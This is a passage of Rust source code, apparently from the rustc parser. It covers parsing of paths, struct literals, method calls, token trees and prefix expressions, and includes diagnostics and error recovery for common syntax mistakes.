/// Like `parse_path`, but also supports parsing `Word` meta items into paths for
/// backwards-compatibility. This is used when parsing derive macro paths in `#[derive]`
/// attributes.
pub fn parse_path_allowing_meta(&mut self, style: PathStyle) -> PResult<'a, ast::Path> {
let meta_ident = match self.token {
token::Interpolated(ref nt) => match **nt {
token::NtMeta(ref meta) => match meta.node {
ast::MetaItemKind::Word => Some(meta.path.clone()),
_ => None,
},
_ => None,
},
_ => None,
};
if let Some(path) = meta_ident {
self.bump();
return Ok(path);
}
self.parse_path(style)
}
crate fn parse_path_segments(&mut self,
segments: &mut Vec<PathSegment>,
style: PathStyle)
-> PResult<'a, ()> {
loop {
let segment = self.parse_path_segment(style)?;
if style == PathStyle::Expr {
// In order to check for trailing angle brackets, we must have finished
// recursing (`parse_path_segment` can indirectly call this function),
// that is, the next token must be the highlighted part of the below example:
//
// `Foo::<Bar as Baz<T>>::Qux`
// ^ here
//
// As opposed to the below highlight (if we had only finished the first
// recursion):
//
// `Foo::<Bar as Baz<T>>::Qux`
// ^ here
//
// `PathStyle::Expr` is only provided at the root invocation and never in
// `parse_path_segment` to recurse and therefore can be checked to maintain
// this invariant.
self.check_trailing_angle_brackets(&segment, token::ModSep);
}
segments.push(segment);
if self.is_import_coupler() || !self.eat(&token::ModSep) {
return Ok(());
}
}
}
fn parse_path_segment(&mut self, style: PathStyle) -> PResult<'a, PathSegment> {
let ident = self.parse_path_segment_ident()?;
let is_args_start = |token: &token::Token| match *token {
token::Lt | token::BinOp(token::Shl) | token::OpenDelim(token::Paren)
| token::LArrow => true,
_ => false,
};
let check_args_start = |this: &mut Self| {
this.expected_tokens.extend_from_slice(
&[TokenType::Token(token::Lt), TokenType::Token(token::OpenDelim(token::Paren))]
);
is_args_start(&this.token)
};
Ok(if style == PathStyle::Type && check_args_start(self) ||
style != PathStyle::Mod && self.check(&token::ModSep)
&& self.look_ahead(1, |t| is_args_start(t)) {
// We use `style == PathStyle::Expr` to check if this is in a recursion or not. If
// it isn't, then we reset the unmatched angle bracket count as we're about to start
// parsing a new path.
if style == PathStyle::Expr {
self.unmatched_angle_bracket_count = 0;
self.max_angle_bracket_count = 0;
}
// Generic arguments are found - `<`, `(`, `::<` or `::(`.
self.eat(&token::ModSep);
let lo = self.span;
let args = if self.eat_lt() {
// `<'a, T, A = U>`
let (args, constraints) =
self.parse_generic_args_with_leaning_angle_bracket_recovery(style, lo)?;
self.expect_gt()?;
let span = lo.to(self.prev_span);
AngleBracketedArgs { args, constraints, span }.into()
} else {
// `(T, U) -> R`
self.bump(); // `(`
let (inputs, recovered) = self.parse_seq_to_before_tokens(
&[&token::CloseDelim(token::Paren)],
SeqSep::trailing_allowed(token::Comma),
TokenExpectType::Expect,
|p| p.parse_ty())?;
if !recovered {
self.bump(); // `)`
}
let span = lo.to(self.prev_span);
let output = if self.eat(&token::RArrow) {
Some(self.parse_ty_common(false, false, false)?)
} else {
None
};
ParenthesizedArgs { inputs, output, span }.into()
};
PathSegment { ident, args, id: ast::DUMMY_NODE_ID }
} else {
// Generic arguments are not found.
PathSegment::from_ident(ident)
})
}
crate fn check_lifetime(&mut self) -> bool {
self.expected_tokens.push(TokenType::Lifetime);
self.token.is_lifetime()
}
/// Parses a single lifetime `'a` or panics.
crate fn expect_lifetime(&mut self) -> Lifetime {
if let Some(ident) = self.token.lifetime() {
let span = self.span;
self.bump();
Lifetime { ident: Ident::new(ident.name, span), id: ast::DUMMY_NODE_ID }
} else {
self.span_bug(self.span, "not a lifetime")
}
}
fn eat_label(&mut self) -> Option<Label> {
if let Some(ident) = self.token.lifetime() {
let span = self.span;
self.bump();
Some(Label { ident: Ident::new(ident.name, span) })
} else {
None
}
}
/// Parses mutability (`mut` or nothing).
fn parse_mutability(&mut self) -> Mutability {
if self.eat_keyword(kw::Mut) {
Mutability::Mutable
} else {
Mutability::Immutable
}
}
fn parse_field_name(&mut self) -> PResult<'a, Ident> {
if let token::Literal(token::Lit { kind: token::Integer, symbol, suffix }) = self.token {
self.expect_no_suffix(self.span, "a tuple index", suffix);
self.bump();
Ok(Ident::new(symbol, self.prev_span))
} else {
self.parse_ident_common(false)
}
}
/// Parse ident (COLON expr)?
fn parse_field(&mut self) -> PResult<'a, Field> {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
// Check if a colon exists one ahead. This means we're parsing a fieldname.
let (fieldname, expr, is_shorthand) = if self.look_ahead(1, |t| {
t == &token::Colon || t == &token::Eq
}) {
let fieldname = self.parse_field_name()?;
// Check for an equals token. This means the source incorrectly attempts to
// initialize a field with an eq rather than a colon.
if self.token == token::Eq {
self.diagnostic()
.struct_span_err(self.span, "expected `:`, found `=`")
.span_suggestion(
fieldname.span.shrink_to_hi().to(self.span),
"replace equals symbol with a colon",
":".to_string(),
Applicability::MachineApplicable,
)
.emit();
}
self.bump(); // `:`
(fieldname, self.parse_expr()?, false)
} else {
let fieldname = self.parse_ident_common(false)?;
// Mimic `x: x` for the `x` field shorthand.
let path = ast::Path::from_ident(fieldname);
let expr = self.mk_expr(fieldname.span, ExprKind::Path(None, path), ThinVec::new());
(fieldname, expr, true)
};
Ok(ast::Field {
ident: fieldname,
span: lo.to(expr.span),
expr,
is_shorthand,
attrs: attrs.into(),
})
}
crate fn mk_expr(&self, span: Span, node: ExprKind, attrs: ThinVec<Attribute>) -> P<Expr> {
P(Expr { node, span, attrs, id: ast::DUMMY_NODE_ID })
}
fn mk_unary(&self, unop: ast::UnOp, expr: P<Expr>) -> ast::ExprKind {
ExprKind::Unary(unop, expr)
}
fn mk_binary(&self, binop: ast::BinOp, lhs: P<Expr>, rhs: P<Expr>) -> ast::ExprKind {
ExprKind::Binary(binop, lhs, rhs)
}
fn mk_call(&self, f: P<Expr>, args: Vec<P<Expr>>) -> ast::ExprKind {
ExprKind::Call(f, args)
}
fn mk_index(&self, expr: P<Expr>, idx: P<Expr>) -> ast::ExprKind {
ExprKind::Index(expr, idx)
}
fn mk_range(&self,
start: Option<P<Expr>>,
end: Option<P<Expr>>,
limits: RangeLimits)
-> PResult<'a, ast::ExprKind> {
if end.is_none() && limits == RangeLimits::Closed {
Err(self.span_fatal_err(self.span, Error::InclusiveRangeWithNoEnd))
} else {
Ok(ExprKind::Range(start, end, limits))
}
}
fn mk_assign_op(&self, binop: ast::BinOp,
lhs: P<Expr>, rhs: P<Expr>) -> ast::ExprKind {
ExprKind::AssignOp(binop, lhs, rhs)
}
fn expect_delimited_token_tree(&mut self) -> PResult<'a, (MacDelimiter, TokenStream)> {
let delim = match self.token {
token::OpenDelim(delim) => delim,
_ => {
let msg = "expected open delimiter";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err)
}
};
let tts = match self.parse_token_tree() {
TokenTree::Delimited(_, _, tts) => tts,
_ => unreachable!(),
};
let delim = match delim {
token::Paren => MacDelimiter::Parenthesis,
token::Bracket => MacDelimiter::Bracket,
token::Brace => MacDelimiter::Brace,
token::NoDelim => self.bug("unexpected no delimiter"),
};
Ok((delim, tts.into()))
}
/// At the bottom (top?) of the precedence hierarchy,
/// Parses things like parenthesized exprs, macros, `return`, etc.
///
/// N.B., this does not parse outer attributes, and is private because it only works
/// correctly if called from `parse_dot_or_call_expr()`.
fn parse_bottom_expr(&mut self) -> PResult<'a, P<Expr>> {
maybe_recover_from_interpolated_ty_qpath!(self, true);
maybe_whole_expr!(self);
// Outer attributes are already parsed and will be
// added to the return value after the fact.
//
// Therefore, prevent sub-parser from parsing
// attributes by giving them a empty "already parsed" list.
let mut attrs = ThinVec::new();
let lo = self.span;
let mut hi = self.span;
let ex: ExprKind;
// Note: when adding new syntax here, don't forget to adjust Token::can_begin_expr().
match self.token {
token::OpenDelim(token::Paren) => {
self.bump();
attrs.extend(self.parse_inner_attributes()?);
// (e) is parenthesized e
// (e,) is a tuple with only one field, e
let mut es = vec![];
let mut trailing_comma = false;
let mut recovered = false;
while self.token != token::CloseDelim(token::Paren) {
es.push(match self.parse_expr() {
Ok(es) => es,
Err(err) => {
// recover from parse error in tuple list
return Ok(self.recover_seq_parse_error(token::Paren, lo, Err(err)));
}
});
recovered = self.expect_one_of(
&[],
&[token::Comma, token::CloseDelim(token::Paren)],
)?;
if self.eat(&token::Comma) {
trailing_comma = true;
} else {
trailing_comma = false;
break;
}
}
if !recovered {
self.bump();
}
hi = self.prev_span;
ex = if es.len() == 1 && !trailing_comma {
ExprKind::Paren(es.into_iter().nth(0).unwrap())
} else {
ExprKind::Tup(es)
};
}
token::OpenDelim(token::Brace) => {
return self.parse_block_expr(None, lo, BlockCheckMode::Default, attrs);
}
token::BinOp(token::Or) | token::OrOr => {
return self.parse_lambda_expr(attrs);
}
token::OpenDelim(token::Bracket) => {
self.bump();
attrs.extend(self.parse_inner_attributes()?);
if self.eat(&token::CloseDelim(token::Bracket)) {
// Empty vector.
ex = ExprKind::Array(Vec::new());
} else {
// Nonempty vector.
let first_expr = self.parse_expr()?;
if self.eat(&token::Semi) {
// Repeating array syntax: [ 0; 512 ]
let count = AnonConst {
id: ast::DUMMY_NODE_ID,
value: self.parse_expr()?,
};
self.expect(&token::CloseDelim(token::Bracket))?;
ex = ExprKind::Repeat(first_expr, count);
} else if self.eat(&token::Comma) {
// Vector with two or more elements.
let remaining_exprs = self.parse_seq_to_end(
&token::CloseDelim(token::Bracket),
SeqSep::trailing_allowed(token::Comma),
|p| Ok(p.parse_expr()?)
)?;
let mut exprs = vec![first_expr];
exprs.extend(remaining_exprs);
ex = ExprKind::Array(exprs);
} else {
// Vector with one element.
self.expect(&token::CloseDelim(token::Bracket))?;
ex = ExprKind::Array(vec![first_expr]);
}
}
hi = self.prev_span;
}
_ => {
if self.eat_lt() {
let (qself, path) = self.parse_qpath(PathStyle::Expr)?;
hi = path.span;
return Ok(self.mk_expr(lo.to(hi), ExprKind::Path(Some(qself), path), attrs));
}
if self.check_keyword(kw::Move) || self.check_keyword(kw::Static) {
return self.parse_lambda_expr(attrs);
}
if self.eat_keyword(kw::If) {
return self.parse_if_expr(attrs);
}
if self.eat_keyword(kw::For) {
let lo = self.prev_span;
return self.parse_for_expr(None, lo, attrs);
}
if self.eat_keyword(kw::While) {
let lo = self.prev_span;
return self.parse_while_expr(None, lo, attrs);
}
if let Some(label) = self.eat_label() {
let lo = label.ident.span;
self.expect(&token::Colon)?;
if self.eat_keyword(kw::While) {
return self.parse_while_expr(Some(label), lo, attrs)
}
if self.eat_keyword(kw::For) {
return self.parse_for_expr(Some(label), lo, attrs)
}
if self.eat_keyword(kw::Loop) {
return self.parse_loop_expr(Some(label), lo, attrs)
}
if self.token == token::OpenDelim(token::Brace) {
return self.parse_block_expr(Some(label),
lo,
BlockCheckMode::Default,
attrs);
}
let msg = "expected `while`, `for`, `loop` or `{` after a label";
let mut err = self.fatal(msg);
err.span_label(self.span, msg);
return Err(err);
}
if self.eat_keyword(kw::Loop) {
let lo = self.prev_span;
return self.parse_loop_expr(None, lo, attrs);
}
if self.eat_keyword(kw::Continue) {
let label = self.eat_label();
let ex = ExprKind::Continue(label);
let hi = self.prev_span;
return Ok(self.mk_expr(lo.to(hi), ex, attrs));
}
if self.eat_keyword(kw::Match) {
let match_sp = self.prev_span;
return self.parse_match_expr(attrs).map_err(|mut err| {
err.span_label(match_sp, "while parsing this match expression");
err
});
}
if self.eat_keyword(kw::Unsafe) {
return self.parse_block_expr(
None,
lo,
BlockCheckMode::Unsafe(ast::UserProvided),
attrs);
}
if self.is_do_catch_block() {
let mut db = self.fatal("found removed `do catch` syntax");
db.help("Following RFC #2388, the new non-placeholder syntax is `try`");
return Err(db);
}
if self.is_try_block() {
let lo = self.span;
assert!(self.eat_keyword(kw::Try));
return self.parse_try_block(lo, attrs);
}
// Span::rust_2018() is somewhat expensive; don't get it repeatedly.
let is_span_rust_2018 = self.span.rust_2018();
if is_span_rust_2018 && self.check_keyword(kw::Async) {
return if self.is_async_block() { // check for `async {` and `async move {`
self.parse_async_block(attrs)
} else {
self.parse_lambda_expr(attrs)
};
}
if self.eat_keyword(kw::Return) {
if self.token.can_begin_expr() {
let e = self.parse_expr()?;
hi = e.span;
ex = ExprKind::Ret(Some(e));
} else {
ex = ExprKind::Ret(None);
}
} else if self.eat_keyword(kw::Break) {
let label = self.eat_label();
let e = if self.token.can_begin_expr()
&& !(self.token == token::OpenDelim(token::Brace)
&& self.restrictions.contains(
Restrictions::NO_STRUCT_LITERAL)) {
Some(self.parse_expr()?)
} else {
None
};
ex = ExprKind::Break(label, e);
hi = self.prev_span;
} else if self.eat_keyword(kw::Yield) {
if self.token.can_begin_expr() {
let e = self.parse_expr()?;
hi = e.span;
ex = ExprKind::Yield(Some(e));
} else {
ex = ExprKind::Yield(None);
}
} else if self.token.is_keyword(kw::Let) {
// Catch this syntax error here, instead of in `parse_ident`, so
// that we can explicitly mention that let is not to be used as an expression
let mut db = self.fatal("expected expression, found statement (`let`)");
db.span_label(self.span, "expected expression");
db.note("variable declaration using `let` is a statement");
return Err(db);
} else if is_span_rust_2018 && self.eat_keyword(kw::Await) {
let (await_hi, e_kind) = self.parse_await_macro_or_alt(lo, self.prev_span)?;
hi = await_hi;
ex = e_kind;
} else if self.token.is_path_start() {
let path = self.parse_path(PathStyle::Expr)?;
// `!`, as an operator, is prefix, so we know this isn't that
if self.eat(&token::Not) {
// MACRO INVOCATION expression
let (delim, tts) = self.expect_delimited_token_tree()?;
hi = self.prev_span;
ex = ExprKind::Mac(respan(lo.to(hi), Mac_ { path, tts, delim }));
} else if self.check(&token::OpenDelim(token::Brace)) {
if let Some(expr) = self.maybe_parse_struct_expr(lo, &path, &attrs) {
return expr;
} else {
hi = path.span;
ex = ExprKind::Path(None, path);
}
} else {
hi = path.span;
ex = ExprKind::Path(None, path);
}
} else {
if !self.unclosed_delims.is_empty() && self.check(&token::Semi) {
// Don't complain about bare semicolons after unclosed braces
// recovery in order to keep the error count down. Fixing the
// delimiters will possibly also fix the bare semicolon found in
// expression context. For example, silence the following error:
// ```
// error: expected expression, found `;`
// --> file.rs:2:13
// |
// 2 | foo(bar(;
// | ^ expected expression
// ```
self.bump();
return Ok(self.mk_expr(self.span, ExprKind::Err, ThinVec::new()));
}
match self.parse_literal_maybe_minus() {
Ok(expr) => {
hi = expr.span;
ex = expr.node.clone();
}
Err(mut err) => {
self.cancel(&mut err);
return Err(self.expected_expression_found());
}
}
}
}
}
let expr = self.mk_expr(lo.to(hi), ex, attrs);
self.maybe_recover_from_bad_qpath(expr, true)
}
/// Parse `await!(<expr>)` calls, or alternatively recover from incorrect but reasonable
/// alternative syntaxes `await <expr>`, `await? <expr>`, `await(<expr>)` and
/// `await { <expr> }`.
fn parse_await_macro_or_alt(
&mut self,
lo: Span,
await_sp: Span,
) -> PResult<'a, (Span, ExprKind)> {
if self.token == token::Not {
// Handle correct `await!(<expr>)`.
// FIXME: make this an error when `await!` is no longer supported
// https://github.com/rust-lang/rust/issues/60610
self.expect(&token::Not)?;
self.expect(&token::OpenDelim(token::Paren))?;
let expr = self.parse_expr().map_err(|mut err| {
err.span_label(await_sp, "while parsing this await macro call");
err
})?;
self.expect(&token::CloseDelim(token::Paren))?;
Ok((self.prev_span, ExprKind::Await(ast::AwaitOrigin::MacroLike, expr)))
} else { // Handle `await <expr>`.
self.parse_incorrect_await_syntax(lo, await_sp)
}
}
fn maybe_parse_struct_expr(
&mut self,
lo: Span,
path: &ast::Path,
attrs: &ThinVec<Attribute>,
) -> Option<PResult<'a, P<Expr>>> {
let struct_allowed = !self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL);
let certainly_not_a_block = || self.look_ahead(1, |t| t.is_ident()) && (
// `{ ident, ` cannot start a block
self.look_ahead(2, |t| t == &token::Comma) ||
self.look_ahead(2, |t| t == &token::Colon) && (
// `{ ident: token, ` cannot start a block
self.look_ahead(4, |t| t == &token::Comma) ||
// `{ ident: ` cannot start a block unless it's a type ascription `ident: Type`
self.look_ahead(3, |t| !t.can_begin_type())
)
);
if struct_allowed || certainly_not_a_block() {
// This is a struct literal, but we don't can't accept them here
let expr = self.parse_struct_expr(lo, path.clone(), attrs.clone());
if let (Ok(expr), false) = (&expr, struct_allowed) {
let mut err = self.diagnostic().struct_span_err(
expr.span,
"struct literals are not allowed here",
);
err.multipart_suggestion(
"surround the struct literal with parentheses",
vec![
(lo.shrink_to_lo(), "(".to_string()),
(expr.span.shrink_to_hi(), ")".to_string()),
],
Applicability::MachineApplicable,
);
err.emit();
}
return Some(expr);
}
None
}
fn parse_struct_expr(&mut self, lo: Span, pth: ast::Path, mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>> {
let struct_sp = lo.to(self.prev_span);
self.bump();
let mut fields = Vec::new();
let mut base = None;
attrs.extend(self.parse_inner_attributes()?);
while self.token != token::CloseDelim(token::Brace) {
if self.eat(&token::DotDot) {
let exp_span = self.prev_span;
match self.parse_expr() {
Ok(e) => {
base = Some(e);
}
Err(mut e) => {
e.emit();
self.recover_stmt();
}
}
if self.token == token::Comma {
let mut err = self.sess.span_diagnostic.mut_span_err(
exp_span.to(self.prev_span),
"cannot use a comma after the base struct",
);
err.span_suggestion_short(
self.span,
"remove this comma",
String::new(),
Applicability::MachineApplicable
);
err.note("the base struct must always be the last field");
err.emit();
self.recover_stmt();
}
break;
}
let mut recovery_field = None;
if let token::Ident(ident, _) = self.token {
if !self.token.is_reserved_ident() && self.look_ahead(1, |t| *t == token::Colon) {
// Use in case of error after field-looking code: `S { foo: () with a }`
let mut ident = ident.clone();
ident.span = self.span;
recovery_field = Some(ast::Field {
ident,
span: self.span,
expr: self.mk_expr(self.span, ExprKind::Err, ThinVec::new()),
is_shorthand: false,
attrs: ThinVec::new(),
});
}
}
let mut parsed_field = None;
match self.parse_field() {
Ok(f) => parsed_field = Some(f),
Err(mut e) => {
e.span_label(struct_sp, "while parsing this struct");
e.emit();
// If the next token is a comma, then try to parse
// what comes next as additional fields, rather than
// bailing out until next `}`.
if self.token != token::Comma {
self.recover_stmt_(SemiColonMode::Comma, BlockMode::Ignore);
if self.token != token::Comma {
break;
}
}
}
}
match self.expect_one_of(&[token::Comma],
&[token::CloseDelim(token::Brace)]) {
Ok(_) => if let Some(f) = parsed_field.or(recovery_field) {
// only include the field if there's no parse error for the field name
fields.push(f);
}
Err(mut e) => {
if let Some(f) = recovery_field {
fields.push(f);
}
e.span_label(struct_sp, "while parsing this struct");
e.emit();
self.recover_stmt_(SemiColonMode::Comma, BlockMode::Ignore);
self.eat(&token::Comma);
}
}
}
let span = lo.to(self.span);
self.expect(&token::CloseDelim(token::Brace))?;
return Ok(self.mk_expr(span, ExprKind::Struct(pth, fields, base), attrs));
}
fn parse_or_use_outer_attributes(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, ThinVec<Attribute>> {
if let Some(attrs) = already_parsed_attrs {
Ok(attrs)
} else {
self.parse_outer_attributes().map(|a| a.into())
}
}
/// Parses a block or unsafe block.
crate fn parse_block_expr(
&mut self,
opt_label: Option<Label>,
lo: Span,
blk_mode: BlockCheckMode,
outer_attrs: ThinVec<Attribute>,
) -> PResult<'a, P<Expr>> {
self.expect(&token::OpenDelim(token::Brace))?;
let mut attrs = outer_attrs;
attrs.extend(self.parse_inner_attributes()?);
let blk = self.parse_block_tail(lo, blk_mode)?;
return Ok(self.mk_expr(blk.span, ExprKind::Block(blk, opt_label), attrs));
}
/// Parses `a.b` or `a(13)` or `a[4]` or just `a`.
fn parse_dot_or_call_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
let attrs = self.parse_or_use_outer_attributes(already_parsed_attrs)?;
let b = self.parse_bottom_expr();
let (span, b) = self.interpolated_or_expr_span(b)?;
self.parse_dot_or_call_expr_with(b, span, attrs)
}
fn parse_dot_or_call_expr_with(&mut self,
e0: P<Expr>,
lo: Span,
mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>> {
// Stitch the list of outer attributes onto the return value.
// A little bit ugly, but the best way given the current code
// structure
self.parse_dot_or_call_expr_with_(e0, lo)
.map(|expr|
expr.map(|mut expr| {
attrs.extend::<Vec<_>>(expr.attrs.into());
expr.attrs = attrs;
match expr.node {
ExprKind::If(..) | ExprKind::IfLet(..) => {
if !expr.attrs.is_empty() {
// Just point to the first attribute in there...
let span = expr.attrs[0].span;
self.span_err(span,
"attributes are not yet allowed on `if` \
expressions");
}
}
_ => {}
}
expr
})
)
}
// Assuming we have just parsed `.`, continue parsing into an expression.
fn parse_dot_suffix(&mut self, self_arg: P<Expr>, lo: Span) -> PResult<'a, P<Expr>> {
if self.span.rust_2018() && self.eat_keyword(kw::Await) {
let span = lo.to(self.prev_span);
let await_expr = self.mk_expr(
span,
ExprKind::Await(ast::AwaitOrigin::FieldLike, self_arg),
ThinVec::new(),
);
self.recover_from_await_method_call();
return Ok(await_expr);
}
let segment = self.parse_path_segment(PathStyle::Expr)?;
self.check_trailing_angle_brackets(&segment, token::OpenDelim(token::Paren));
Ok(match self.token {
token::OpenDelim(token::Paren) => {
// Method call `expr.f()`
let mut args = self.parse_unspanned_seq(
&token::OpenDelim(token::Paren),
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| Ok(p.parse_expr()?)
)?;
args.insert(0, self_arg);
let span = lo.to(self.prev_span);
self.mk_expr(span, ExprKind::MethodCall(segment, args), ThinVec::new())
}
_ => {
// Field access `expr.f`
if let Some(args) = segment.args {
self.span_err(args.span(),
"field expressions may not have generic arguments");
}
let span = lo.to(self.prev_span);
self.mk_expr(span, ExprKind::Field(self_arg, segment.ident), ThinVec::new())
}
})
}
fn parse_dot_or_call_expr_with_(&mut self, e0: P<Expr>, lo: Span) -> PResult<'a, P<Expr>> {
let mut e = e0;
let mut hi;
loop {
// expr?
while self.eat(&token::Question) {
let hi = self.prev_span;
e = self.mk_expr(lo.to(hi), ExprKind::Try(e), ThinVec::new());
}
// expr.f
if self.eat(&token::Dot) {
match self.token {
token::Ident(..) => {
e = self.parse_dot_suffix(e, lo)?;
}
token::Literal(token::Lit { kind: token::Integer, symbol, suffix }) => {
let span = self.span;
self.bump();
let field = ExprKind::Field(e, Ident::new(symbol, span));
e = self.mk_expr(lo.to(span), field, ThinVec::new());
self.expect_no_suffix(span, "a tuple index", suffix);
}
token::Literal(token::Lit { kind: token::Float, symbol, .. }) => {
self.bump();
let fstr = symbol.as_str();
let msg = format!("unexpected token: `{}`", symbol);
let mut err = self.diagnostic().struct_span_err(self.prev_span, &msg);
err.span_label(self.prev_span, "unexpected token");
if fstr.chars().all(|x| "0123456789.".contains(x)) {
let float = match fstr.parse::<f64>().ok() {
Some(f) => f,
None => continue,
};
let sugg = pprust::to_string(|s| {
use crate::print::pprust::PrintState;
s.popen()?;
s.print_expr(&e)?;
s.s.word( ".")?;
s.print_usize(float.trunc() as usize)?;
s.pclose()?;
s.s.word(".")?;
s.s.word(fstr.splitn(2, ".").last().unwrap().to_string())
});
err.span_suggestion(
lo.to(self.prev_span),
"try parenthesizing the first index",
sugg,
Applicability::MachineApplicable
);
}
return Err(err);
}
_ => {
// FIXME Could factor this out into non_fatal_unexpected or something.
let actual = self.this_token_to_string();
self.span_err(self.span, &format!("unexpected token: `{}`", actual));
}
}
continue;
}
if self.expr_is_complete(&e) { break; }
match self.token {
// expr(...)
token::OpenDelim(token::Paren) => {
let seq = self.parse_unspanned_seq(
&token::OpenDelim(token::Paren),
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| Ok(p.parse_expr()?)
).map(|es| {
let nd = self.mk_call(e, es);
let hi = self.prev_span;
self.mk_expr(lo.to(hi), nd, ThinVec::new())
});
e = self.recover_seq_parse_error(token::Paren, lo, seq);
}
// expr[...]
// Could be either an index expression or a slicing expression.
token::OpenDelim(token::Bracket) => {
self.bump();
let ix = self.parse_expr()?;
hi = self.span;
self.expect(&token::CloseDelim(token::Bracket))?;
let index = self.mk_index(e, ix);
e = self.mk_expr(lo.to(hi), index, ThinVec::new())
}
_ => return Ok(e)
}
}
return Ok(e);
}
crate fn process_potential_macro_variable(&mut self) {
let (token, span) = match self.token {
token::Dollar if self.span.ctxt() != syntax_pos::hygiene::SyntaxContext::empty() &&
self.look_ahead(1, |t| t.is_ident()) => {
self.bump();
let name = match self.token {
token::Ident(ident, _) => ident,
_ => unreachable!()
};
let mut err = self.fatal(&format!("unknown macro variable `{}`", name));
err.span_label(self.span, "unknown macro variable");
err.emit();
self.bump();
return
}
token::Interpolated(ref nt) => {
self.meta_var_span = Some(self.span);
// Interpolated identifier and lifetime tokens are replaced with usual identifier
// and lifetime tokens, so the former are never encountered during normal parsing.
match **nt {
token::NtIdent(ident, is_raw) => (token::Ident(ident, is_raw), ident.span),
token::NtLifetime(ident) => (token::Lifetime(ident), ident.span),
_ => return,
}
}
_ => return,
};
self.token = token;
self.span = span;
}
/// Parses a single token tree from the input.
crate fn parse_token_tree(&mut self) -> TokenTree {
match self.token {
token::OpenDelim(..) => {
let frame = mem::replace(&mut self.token_cursor.frame,
self.token_cursor.stack.pop().unwrap());
self.span = frame.span.entire();
self.bump();
TokenTree::Delimited(
frame.span,
frame.delim,
frame.tree_cursor.stream.into(),
)
},
token::CloseDelim(_) | token::Eof => unreachable!(),
_ => {
let (token, span) = (mem::replace(&mut self.token, token::Whitespace), self.span);
self.bump();
TokenTree::Token(span, token)
}
}
}
/// Parses a stream of tokens into a list of `TokenTree`s, up to EOF.
pub fn parse_all_token_trees(&mut self) -> PResult<'a, Vec<TokenTree>> {
let mut tts = Vec::new();
while self.token != token::Eof {
tts.push(self.parse_token_tree());
}
Ok(tts)
}
pub fn parse_tokens(&mut self) -> TokenStream {
let mut result = Vec::new();
loop {
match self.token {
token::Eof | token::CloseDelim(..) => break,
_ => result.push(self.parse_token_tree().into()),
}
}
TokenStream::new(result)
}
/// Parse a prefix-unary-operator expr
fn parse_prefix_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
let attrs = self.parse_or_use_outer_attributes(already_parsed_attrs)?;
let lo = self.span;
// Note: when adding new unary operators, don't forget to adjust Token::can_begin_expr()
let (hi, ex) = match self.token {
token::Not => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Not, e))
}
// Suggest `!` for bitwise negation when encountering a `~`
token::Tilde => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
let span_of_tilde = lo;
let mut err = self.diagnostic()
.struct_span_err(span_of_tilde, "`~` cannot be used as a unary operator");
err.span_suggestion_short(
span_of_tilde,
"use `!` to perform bitwise negation",
"!".to_owned(),
Applicability::MachineApplicable
);
err.emit();
(lo.to(span), self.mk_unary(UnOp::Not, e))
}
token::BinOp(token::Minus) => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Neg, e))
}
token::BinOp(token::Star) => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Deref, e))
}
token::BinOp(token::And) | token::AndAnd => {
self.expect_and()?;
let m = self.parse_mutability();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), ExprKind::AddrOf(m, e))
}
token::Ident(..) if self.token.is_keyword(kw::Box) => {
self.bump();
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), ExprKind::Box(e))
}
token::Ident(..) if self.token.is_ident_named(sym::not) => {
// `not` is just an ordinary identifier in Rust-the-language,
// but as `rustc`-the-compiler, we can issue clever diagnostics
// for confused users who really want to say `!`
let token_cannot_continue_expr = |t: &token::Token| match *t {
// These tokens can start an expression after `!`, but
// can't continue an expression after an ident
token::Ident(ident, is_raw) => token::ident_can_begin_expr(ident, is_raw),
token::Literal(..) | token::Pound => true,
token::Interpolated(ref nt) => match **nt {
token::NtIdent(..) | token::NtExpr(..) |
token::NtBlock(..) | token::NtPath(..) => true,
_ => false,
},
_ => false
};
let cannot_continue_expr = self.look_ahead(1, token_cannot_continue_expr);
if cannot_continue_expr {
self.bump();
// Emit the error ...
let mut err = self.diagnostic()
.struct_span_err(self.span,
&format!("unexpected {} after identifier",
self.this_token_descr()));
// span the `not` plus trailing whitespace to avoid
// trailing whitespace after the `!` in our suggestion
let to_replace = self.sess.source_map()
.span_until_non_whitespace(lo.to(self.span));
err.span_suggestion_short(
to_replace,
"use `!` to perform logical negation",
"!".to_owned(),
Applicability::MachineApplicable
);
err.emit();
// —and recover! (just as if we were in the block
// for the `token::Not` arm)
let e = self.parse_prefix_expr(None);
let (span, e) = self.interpolated_or_expr_span(e)?;
(lo.to(span), self.mk_unary(UnOp::Not, e))
} else {
return self.parse_dot_or_call_expr(Some(attrs));
}
}
_ => { return self.parse_dot_or_call_expr(Some(attrs)); }
};
return Ok(self.mk_expr(lo.to(hi), ex, attrs));
}
/// Parses an associative expression.
///
/// This parses an expression accounting for associativity and precedence of the operators in
/// the expression.
#[inline]
fn parse_assoc_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
self.parse_assoc_expr_with(0, already_parsed_attrs.into())
}
/// Parses an associative expression with operators of at least `min_prec` precedence.
fn parse_assoc_expr_with(&mut self,
min_prec: usize,
lhs: LhsExpr)
-> PResult<'a, P<Expr>> {
let mut lhs = if let LhsExpr::AlreadyParsed(expr) = lhs {
expr
} else {
let attrs = match lhs {
LhsExpr::AttributesParsed(attrs) => Some(attrs),
_ => None,
};
